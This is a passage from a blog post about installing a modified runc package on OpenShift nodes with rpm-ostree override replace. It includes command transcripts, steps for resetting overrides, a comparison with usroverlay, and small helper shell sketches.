for the environment in which it will be executed. In my case, it
was easiest to do this via Brew or Koji. I cloned the dist-git
repository (via the <code>fedpkg</code> or <code>rhpkg</code> tool), created patches and
updated the <code>runc.spec</code> file. Then I built the SRPM (<code>.src.rpm</code>)
and started a scratch build in Brew. After the build completed I
made the resulting <code>.rpm</code> publicly available, so that it can be
fetched from the OpenShift cluster.</p>
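<p>A simple guard might have caught the problem before it broke the
node: run the candidate binary on the target host before copying it
into place. The sketch below assumes the candidate has been downloaded
to a scratch location and made executable, and that a dynamic linking
failure makes <code>--version</code> exit with an error. The function
name <code>install_if_runnable</code> is illustrative.</p>
<pre class="shell"><code># Sketch: copy a binary into place only if it can run on this host.
#   $1: candidate executable   $2: destination path
install_if_runnable() {
    candidate=$1
    target=$2
    if "$candidate" --version; then
        cp "$candidate" "$target"
    else
        echo "refusing to install $candidate: it does not run on this host"
        return 1
    fi
}

# Hypothetical usage (the scratch path is an assumption):
#   install_if_runnable /var/tmp/runc /usr/bin/runc</code></pre>
<p>This only shows that the program starts. It says nothing about
whether the modified behaviour is correct.</p>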
<h2 id="override-replace-via-node-debug-container"><code>override replace</code> via node debug container <a href="#override-replace-via-node-debug-container" class="section">§</a></h2>
<p>I now have my modified <code>runc</code> in an RPM package. So I can use
<code>rpm-ostree override replace</code> to install it. In a node debug
shell on the host:</p>
<pre class="shell"><code>sh-4.4# rpm-ostree override replace \
  https://ftweedal.fedorapeople.org/runc-1.0.0-98.rhaos4.8.gitcd80260.el8.x86_64.rpm
Downloading &#39;https://ftweedal.fedorapeople.org/runc-1.0.0-98.rhaos4.8.gitcd80260.el8.x86_64.rpm&#39;... done!
Checking out tree eb6dd3b... done
No enabled rpm-md repositories.
Importing rpm-md... done
Resolving dependencies... done
Applying 1 override
Processing packages... done
Running pre scripts... done
Running post scripts... done
Running posttrans scripts... done
Writing rpmdb... done
Writing OSTree commit... done
Staging deployment... done
Upgraded:
  runc 1.0.0-97.rhaos4.8.gitcd80260.el8 -&gt; 1.0.0-98.rhaos4.8.gitcd80260.el8
Run &quot;systemctl reboot&quot; to start a reboot</code></pre>
<p><code>rpm-ostree</code> downloaded the package and prepared the updated OS.
Per the advice, the update is not active yet; I need to reboot:</p>
<pre class="shell"><code>sh-4.4# rpm -q runc
runc-1.0.0-97.rhaos4.8.gitcd80260.el8.x86_64
sh-4.4# systemctl reboot
sh-4.4# exit
sh-4.2# 
Removing debug pod ...</code></pre>
<p>After reboot I started a node debug container and verified that the
modified version of <code>runc</code> is visible:</p>
<pre class="shell"><code>% oc debug node/worker-a
Starting pod/worker-a-debug ...
To use host binaries, run `chroot /host`
Pod IP: 10.0.128.2
If you don&#39;t see a command prompt, try pressing enter.
sh-4.2# chroot /host
sh-4.4# rpm -q runc
runc-1.0.0-98.rhaos4.8.gitcd80260.el8.x86_64</code></pre>
<p>And the fact that the debug container is working proves that the
modified version of runc isn’t <em>completely</em> broken! Testing the new
functionality is a topic for a different post, so I’ll leave it at
that.</p>
<h3 id="listing-and-resetting-overrides">Listing and resetting overrides <a href="#listing-and-resetting-overrides" class="section">§</a></h3>
<p><code>rpm-ostree status --booted</code> lists the current base image and any
overrides that have been applied:</p>
<pre class="shell"><code>sh-4.4# rpm-ostree status --booted
State: idle
BootedDeployment:
* pivot://quay.io/openshift-release-dev/ocp-v4.0-art-dev@sha256:9a23adde268dc8937ae293594f58fc4039b574210f320ebdac85a50ef40220dd
              CustomOrigin: Managed by machine-config-operator
                   Version: 48.84.202106231817-0 (2021-06-23T18:21:06Z)
      ReplacedBasePackages: runc 1.0.0-97.rhaos4.8.gitcd80260.el8 -&gt; 1.0.0-98.rhaos4.8.gitcd80260.el8</code></pre>
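<p>To check for an override in a script, the status output can be
filtered. This is a minimal sketch that assumes the text format shown
above and only reports the first package on the
<code>ReplacedBasePackages</code> line; the function name
<code>replaced_packages</code> is illustrative.</p>
<pre class="shell"><code># Sketch: read `rpm-ostree status --booted` output on stdin and print
# the name of the first replaced base package, if any.
replaced_packages() {
    awk '$1 == "ReplacedBasePackages:" { print $2 }'
}

# Hypothetical usage:
#   rpm-ostree status --booted | replaced_packages</code></pre>
<p>Empty output means that no base package has been replaced in the
booted deployment.</p>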
<p>To reset an override for a specific package, run <code>rpm-ostree override reset $PKG</code>:</p>
<pre class="shell"><code>sh-4.4# rpm-ostree override reset runc
Staging deployment... done
Freed: 1.1 GB (pkgcache branches: 0)
Downgraded:
  runc 1.0.0-98.rhaos4.8.gitcd80260.el8 -&gt; 1.0.0-97.rhaos4.8.gitcd80260.el8
Run &quot;systemctl reboot&quot; to start a reboot</code></pre>
<p>To reset <em>all</em> overrides, execute <code>rpm-ostree reset</code>:</p>
<pre class="shell"><code>sh-4.4# rpm-ostree reset
Staging deployment... done
Freed: 54.8 MB (pkgcache branches: 0)
Downgraded:
  runc 1.0.0-98.rhaos4.8.gitcd80260.el8 -&gt; 1.0.0-97.rhaos4.8.gitcd80260.el8
Run &quot;systemctl reboot&quot; to start a reboot</code></pre>
<h2 id="discussion">Discussion <a href="#discussion" class="section">§</a></h2>
<p>I achieved my goal of installing a modified <code>runc</code> executable on an
OpenShift node. There were two approaches:</p>
<ol type="1">
<li><p><code>rpm-ostree usroverlay</code> creates a writable overlay on <code>/usr</code>.
The overlay disappears at reboot, which is fine for my testing
needs. This technique doesn’t work from a node debug container;
you have to log in over SSH, which requires additional steps to
add SSH keys.</p></li>
<li><p><code>rpm-ostree override replace</code> overrides a particular package RPM.
The change takes effect after reboot and is persistent. It is
easy to roll back or reset the override. This technique does not
require SSH login; it works fine in a node debug container.</p></li>
</ol>
<p>Because I needed to build my package in a RHEL 8.4 / RHCOS 4.8
buildroot, I used Brew. The build artifacts are RPMs. Therefore
<code>rpm-ostree override replace</code> is the most convenient option for me.</p>
<p>Both options apply changes <em>per-node</em>. I confirmed with CoreOS
developers that there is currently no way to roll out a package override
cluster-wide or to a defined group of nodes (e.g. to
<code>MachineConfigPool/worker</code> via a <code>MachineConfig</code>). So for now, you
either have to apply changes/overrides on specific nodes, or build
the whole <code>machine-os-content</code> image and upgrade the cluster. As a
container runtime developer, my sweet spot is in a gulf between the
existing options. I can tolerate this mild annoyance on the
assumption that it discourages messing around in production
environments.</p>
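<p>Applying an override to several nodes therefore means repeating
the per-node step. The loop below is a rough sketch of that, assuming
that <code>oc debug</code> can run the command non-interactively on each
node. The function name <code>override_on_nodes</code> and the
<code>OC</code> variable (which allows a dry run) are illustrative. The
sketch does not drain or reboot nodes, so each node still needs a
reboot before the override takes effect.</p>
<pre class="shell"><code># Assumption: "oc" is on the PATH; set OC=echo for a dry run.
OC=${OC:-oc}

# Sketch: stage a package override on each of the given nodes.
#   $1: URL of the replacement RPM   remaining args: node/NAME ...
override_on_nodes() {
    rpm_url=$1
    shift
    for node in "$@"; do
        $OC debug "$node" -- chroot /host \
            rpm-ostree override replace "$rpm_url"
    done
}

# Hypothetical usage:
#   override_on_nodes "$RPM_URL" \
#       $(oc get nodes -l node-role.kubernetes.io/worker -o name)</code></pre>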
<p>In the meantime, now that I have worked out how to install my
modified <code>runc</code> onto worker nodes, I will get on with testing it!</p>]]></summary>
</entry>

</feed>
